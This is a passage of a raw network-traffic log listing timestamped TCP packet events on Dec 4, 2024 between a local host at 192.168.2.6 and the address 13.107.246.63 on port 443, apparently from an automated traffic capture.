                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203257084 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203270912 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203322887 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203389883 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203402042 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203413010 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.203418970 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.212389946 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.212434053 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.212490082 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.212762117 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.212779045 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.487730026 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.488303900 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.488328934 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.488831997 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.488846064 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.927611113 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.928294897 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.928323984 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.928852081 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.928858042 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.939302921 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.942817926 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.942920923 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.943032026 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.943057060 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.943068981 CET49812443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.943074942 CET4434981213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.946252108 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.946321011 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.946424961 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.946588993 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:48.946599007 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.369366884 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.373387098 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.373466969 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.373466015 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.373519897 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.680372000 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.680428028 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.680444956 CET49813443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.680452108 CET4434981313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.959779978 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.959841013 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.959908962 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.968564987 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.968599081 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.991864920 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:49.997252941 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.025343895 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.048943043 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.064604998 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.080148935 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.103826046 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.103842974 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.104355097 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.104362965 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.104881048 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.104919910 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.105292082 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.105305910 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.105933905 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.105947971 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.106343031 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.106349945 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.444272041 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.447976112 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.448065996 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.448136091 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.448158979 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.448169947 CET49814443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.448174953 CET4434981413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.450607061 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.451492071 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.451550007 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.451622963 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.451982975 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.451991081 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455435991 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455519915 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455931902 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455931902 CET49815443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455965042 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.455977917 CET4434981513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.458678007 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.458717108 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.458789110 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.458931923 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.458944082 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.476938963 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481169939 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481268883 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481313944 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481334925 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481347084 CET49816443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.481353045 CET4434981613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.488661051 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.488733053 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.488833904 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.488993883 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.489001989 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.728534937 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.750655890 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.750699997 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.751194000 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:50.751203060 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.172720909 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.174909115 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.174971104 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.175040007 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.175090075 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.175991058 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.176023960 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.176038027 CET49817443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.176043034 CET4434981713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.180160046 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.180219889 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.180305004 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.180479050 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.180486917 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.698437929 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.709424973 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.709450006 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.709893942 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:51.709899902 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.140980959 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.144448996 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.144511938 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.149491072 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.149524927 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.149538994 CET49818443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.149545908 CET4434981813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.157608986 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.157672882 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.157771111 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.172905922 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.172935009 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.248142004 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.255675077 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.261172056 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.261223078 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.261683941 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.261692047 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.291867018 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.299338102 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.299367905 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.299725056 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.299731970 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.308975935 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.309030056 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.309487104 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.309498072 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.699074030 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.699161053 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.699263096 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.706903934 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.710374117 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.710462093 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.743213892 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.747170925 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.747256994 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.747287035 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.747328043 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.775497913 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.775531054 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.775597095 CET49819443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.775604010 CET4434981913.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.776660919 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.776694059 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.776711941 CET49820443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.776720047 CET4434982013.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.778351068 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.778388023 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.778405905 CET49821443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:52.778413057 CET4434982113.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.037434101 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.046155930 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.046228886 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.046303988 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.058028936 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.058046103 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.059022903 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.059030056 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.059225082 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.059283018 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.062063932 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.062122107 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.062186956 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.062558889 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.062570095 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.063720942 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.063750982 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.063803911 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.065033913 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.065052986 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.505341053 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.505429983 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.505650997 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.535341978 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.535377026 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.535392046 CET49822443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.535398960 CET4434982213.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.538866997 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.538944006 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.539028883 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.539244890 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:53.539256096 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.037139893 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.037935972 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.037952900 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.038465023 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.038474083 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.505764961 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.508934021 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.509038925 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.509084940 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.509099960 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.509120941 CET49823443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.509126902 CET4434982313.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.512511015 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.512558937 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.512625933 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.512840033 CET49828443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.512854099 CET4434982813.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.789155006 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.789850950 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.789886951 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.790369987 CET49824443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.790375948 CET4434982413.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.797734976 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.798259974 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.798280001 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.798772097 CET49826443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.798783064 CET4434982613.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.856703043 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.860411882 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.860445023 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.860919952 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:54.860929012 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.266541958 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.276532888 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.276568890 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.276916027 CET49827443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.276922941 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.308547020 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.311736107 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.311815023 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.311826944 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.311875105 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.347290993 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.347357035 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.347381115 CET49825443192.168.2.613.107.246.63
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.347388983 CET4434982513.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.709594965 CET4434982713.107.246.63192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:00:55.713789940 CET4434982713.107.246.63192.168.2.6
